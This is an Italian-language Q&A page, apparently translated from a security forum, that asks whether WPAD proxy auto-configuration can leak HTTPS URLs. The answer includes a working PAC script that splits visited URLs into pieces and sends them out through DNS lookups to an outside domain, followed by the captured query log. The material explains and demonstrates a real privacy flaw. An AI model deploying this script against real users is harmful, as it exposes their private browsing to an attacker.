L'individuazione automatica del proxy Web può perdere gli URL HTTPS?

3

Il protocollo WPAD può in alcuni casi consentire a un utente malintenzionato di ottenere che i client utilizzino un PAC script.

Sembra essere ben documentato, che possa essere usato per eseguire attacchi MITM sul traffico HTTP. Tuttavia, non vedo alcuna discussione sull'impatto sul traffico HTTPS.

Per quanto posso dire, non consente un attacco MITM completo sul traffico HTTPS poiché lo script PAC può solo indirizzare il browser a quale proxy utilizzare, ma ci sarà comunque un end-to-end Connessione SSL tra il client e il server legittimo.

Tuttavia, uno degli argomenti per la funzione FindProxyForURL fornita dall'hacker è l'URL completo. Inoltre FindProxyForURL può attivare ricerche DNS.

Un utente malintenzionato può utilizzarlo per rilevare gli URL HTTPS? In caso contrario, quale protezione è in atto per prevenire tali perdite?

    
posta kasperd 04.05.2015 - 23:49
fonte

1 risposta

5

Sì, l'URL viene passato a FindProxyForURL() e puoi estinguerlo tramite DNS. Ecco un esempio di file PAC:

function FindProxyForURL(url, host) {
    if (host == 'navalny.com') {
        var chunks = url.match(/[-a-zA-Z0-9]+/g);
        dnsResolve('x.darkk.net.ru.');
        if (chunks) {
            chunks.forEach(function(x) {
                dnsResolve(x + '.y.darkk.net.ru');
            });
        }
        dnsResolve('z.darkk.net.ru.');
        return 'SOCKS5 127.0.0.1:1024'; // drop connection
    }
    return 'DIRECT';
}

Se Firefox / 39.0 passa a https://navalny.com/the-capability-url?q=q mentre questo file PAC è attivo dopo che le query DNS sono state inviate:

Standard query 0xfb5d  A x.darkk.net.ru
Standard query 0x9ca7  AAAA x.darkk.net.ru
Standard query 0xf1cc  A x.darkk.net.ru
Standard query 0xf60c  AAAA x.darkk.net.ru
Standard query 0x574a  A https.y.darkk.net.ru
Standard query 0xfad9  AAAA https.y.darkk.net.ru
Standard query 0x2289  A https.y.darkk.net.ru
Standard query 0x7ed4  AAAA https.y.darkk.net.ru
Standard query 0x85b2  A navalny.y.darkk.net.ru
Standard query 0xa7cd  AAAA navalny.y.darkk.net.ru
Standard query 0x1ca9  A navalny.y.darkk.net.ru
Standard query 0xa400  AAAA navalny.y.darkk.net.ru
Standard query 0xec51  A com.y.darkk.net.ru
Standard query 0x1ea7  AAAA com.y.darkk.net.ru
Standard query 0x25bd  A the-capability-url.y.darkk.net.ru
Standard query 0x844c  AAAA the-capability-url.y.darkk.net.ru
Standard query 0x200b  A q.y.darkk.net.ru
Standard query 0x5a62  AAAA q.y.darkk.net.ru
Standard query 0xeb02  A q.y.darkk.net.ru
Standard query 0xaa2c  AAAA q.y.darkk.net.ru
Standard query 0xee8f  A z.darkk.net.ru
Standard query 0xe9b7  AAAA z.darkk.net.ru
    
risposta data 27.07.2015 - 11:09
fonte

Leggi altre domande sui tag